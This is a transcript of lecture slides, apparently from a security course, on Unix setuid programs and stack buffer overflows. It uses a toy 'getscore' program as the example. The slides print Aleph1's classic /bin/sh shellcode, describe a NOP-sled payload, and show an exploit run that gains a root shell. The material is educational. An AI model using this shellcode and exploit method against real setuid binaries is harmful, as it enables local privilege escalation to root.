Presentation is loading. Please wait.

Presentation is loading. Please wait.

Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.

Published byRalph Washington Modified over 8 years ago

Similar presentations

Presentation on theme: "Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score."— Presentation transcript:

1 Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score –Maintain all students’ scores in a file –Local command-line operation 1

2 Score file format 2 [root@localhost getscore]# cat score.txt Mary Doe:123-45-6789:A+:… Tom Smith:567-89-1234:B:… User name Student SSN Score

3 Our little “getscore” program User name and SSN for authentication Score file only readable to user root A program reads the score file and report the grade to an authenticated user 3 [root@localhost]# ls -l total 24 -rw------- 1 root root 46 Aug 20 11:35 score.txt -rwsr-xr-x 1 root root 12947 Aug 20 11:36 getscore Setuid bit

4 Unix file system protection Attributes of a file [root@localhost course_scores]# ls -l total 20 -rwsr-xr-x 1 root root 13587 Aug 25 2009 getscore -rw------- 1 root root 88 Aug 25 2009 score.txt 4 Permission bitsOwnerGroup directory bitowner permissions group permissions other user permissions d: directory r:read w:write x:execute (access a directory) s:set-uid bit {[d,-]} {[r,-] [w,-] [x,s,-]} {[r,-] [w,-] [x,s,-]} {[r,-] [w,-] [x, -]}

5 Unix set-uid mechanism A user can execute a program if the program file has “x” bit set for the user Typically the program process will have the invoker’s privilege If the program file also has the set-uid bit set for the owner (“s” is shown for the owner), then the program will also have the program owner’s privilege. We call such programs “set-uid programs”. 5

6 Unix set-uid mechanism Provides a path for privilege elevation –There are legitimate needs for elevating a process’ privilege to perform its jobs, e.g. “passwd” command. (Simplified version) Two user id fields in a process’s PCB: real user id (ruid), and effective user id (euid) –It is the euid that matters in OS protection. –non-setuid programs will have both fields set to the id of the invoker when the program is started. –Setuid programs have ruid set to the invoker, but euid set to the owner of the executable when started. –There are programming interfaces for changing the two uid’s during the program’s execution, and rules on which changes are allowed. 6

7 Getting your score 7 [simon@localhost]$./getscore "Mary Doe" 123-45-6789 Your score is A+ [xou@localhost course_scores]$./getscore "Tom Smith" 567-89-1234 Your score is B [root@localhost]$./getscore "Mary Doe" 123-45-7890 Invalid user name or SSN.

8 Security problems in getscore First things first: analyze the threat –Who are the adversaries? What are they after? What are the potential risks and their implications? How would you mitigate the risk? 8

9 Let’s try this 9 [simon@localhost getscore]$./getscore "Mary Doe" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA Segmentation fault There is a vulnerability in the getscore program A protection mechanism at work

10 .text.data heap allocated data heap stack < > local variables function’s arguments saved EBP saved EIP main() local variables bottom of stack ESP EBP address growth function’s return address Linux process memory map 10 argc, **argv, **envp environment var’s a stack frame

11 Calling a function 11 main(){ : function(s) : }.text.data heap top of stack < > main() local vars ESP EBP argc, **argv, **envp environment var’s

12 Calling a function 12 main(){ : function(s) : } push s.text.data heap top of stack < > ESP EBP argc, **argv, **envp environment var’s function argument main() local vars

13 Calling a function 13 main(){ : function(s) : } function(s){ : return; } push return EIP.text.data heap > function argument saved EIP ESP EBP argc, **argv, **envp environment var’s top of stack < main() local vars

14 Calling a function 14 main(){ : function(s) : } function(s){ : return; }.text.data heap top of stack < > function argument saved EBP saved EIP main() local vars ESP EBP argc, **argv, **envp environment var’s local variables push EBP allocate a new frame for local variables

15 Stack buffer overflow attack 15 main(){ : function(s) : } function(s){ : return; }.text.data heap top of stack < > function argument saved EBP saved EIP main() local vars ESP EBP argc, **argv, **envp environment var’s local variables

16 Returning from a function 16 main(){ : function(s) : } function(s){ : return; } release the function’s frame and restore the saved EBP.text.data heap > function argument saved EBP saved EIP main() local vars ESP argc, **argv, **envp environment var’s local variables < EBP

17 Returning from a function 17 main(){ : function(s) : } function(s){ : return; } release control to the caller.text.data heap > function argument saved EBP saved EIP main() local vars ESP argc, **argv, **envp environment var’s local variables EBP A buffer overflow on stack can change this control flow <

18 Stack overflow attack 18 main(){ : function(s) : } function(s){ : return; }.text.data heap top of stack < > function argument saved EBP saved EIP main() local vars ESP EBP argc, **argv, **envp environment var’s local variables push EBP allocate a new frame for local variables AAAAAAAAAAA AAAAAAAAAAAAAAA A A

19 Stack overflow attack 19 main(){ : function(s) : } function(s){ : return; }.text.data heap top of stack < > function argument saved EBP saved EIP main() local vars ESP EBP argc, **argv, **envp environment var’s local variables AAAAAAAAAAA AAAAAAAAAAAAAAA A A

20 Stack overflow attack 20 main(){ : function(s) : } function(s){ : return; } release the function’s frame and restore the saved EBP.text.data heap > function argument saved EBP saved EIP main() local vars ESP argc, **argv, **envp environment var’s local variables < EBP 0x41414141 AAAAAAAAAAA AAAAAAAAAAAAAAA A A

21 Stack overflow attack 21 main(){ : function(s) : } function(s){ : return; } Control Hijacked by Attacker!.text.data heap > function argument saved EBP saved EIP main() local vars ESP argc, **argv, **envp environment var’s local variables < AAAAAAAAAAA AAAAAAAAAAAAAAA A A EBP 0x41414141

22 Buffer overflow vulnerability Program fails to ensure that a write to a buffer is always within its bound. When buffer overflow happens, data structures in memory will be corrupted, potentially changing the program’s behavior. –In many cases it can lead to the execution of arbitrary code by attackers A common problem for unsafe programming languages such as C and C++. 22

23 Setuid and buffer overflow What is the implication of a buffer overflow in a setuid program? –If the buffer overflow happens when one of the uid fields contains more privilege, it could result in a local privilege escalation vulnerability, i.e. an attacker who already obtained local access on the system can escalate his privilege. –If the setuid program is owned by root, an attacker who has user account privilege may gain root privilege on the system. 23

24 Creating a malicious input 24 The original buffer EIP Shell CodeNOP sled Questions: 1. How long should the input be? 2. Where should we put the EIP in the input? 3. What value of EIP should be put in?

25 Shell code to use 25 /* Aleph1's Linux shellcode from "Smashing the stack for fun and profit", Phrack 49, vol 7 */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";

26 Getting a root shell 26 [xou@localhost simon]$./exploit_gen_with_esp 0xbffff830 160 120 Length of shell code: 45 Using sp: 0xbffff830 Using address: 0xbffff7b8 NOP sled: 103 bytes [xou@localhost simon]$ cd /root/course_scores/ [xou@localhost course_scores]$./getscore aaa $EGG sh-2.05b# sh-2.05b# whoami root sh-2.05b#

27 Summary OS protection prevents applications from interfering with each other Protection mechanisms are limited by the possible vulnerabilities in the application and system code 27

Download ppt "Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score."

Similar presentations

Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.
Review: Software Security David Brumley Carnegie Mellon University.

Review: Software Security David Brumley Carnegie Mellon University.
Breno de MedeirosFlorida State University Fall 2005 Buffer overflow and stack smashing attacks Principles of application software security.

Breno de MedeirosFlorida State University Fall 2005 Buffer overflow and stack smashing attacks Principles of application software security.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.

Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.

Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.
Stack buffer overflow http://en.wikipedia.org/wiki/Stack_buffer_overflow.

Stack buffer overflow
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.

Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.
CMSC 414 Computer and Network Security Lecture 20 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 20 Jonathan Katz.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.

Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.
Lecture 0 Appendix on Implementation Threats Material from Warren Page & Chpt 11, Information Security by Mark Stamp.

Lecture 0 Appendix on Implementation Threats Material from Warren Page & Chpt 11, Information Security by Mark Stamp.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.

Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.
Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.

Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.
Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,

Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,
Mitigation of Buffer Overflow Attacks

Mitigation of Buffer Overflow Attacks

Similar presentations

Ads by Google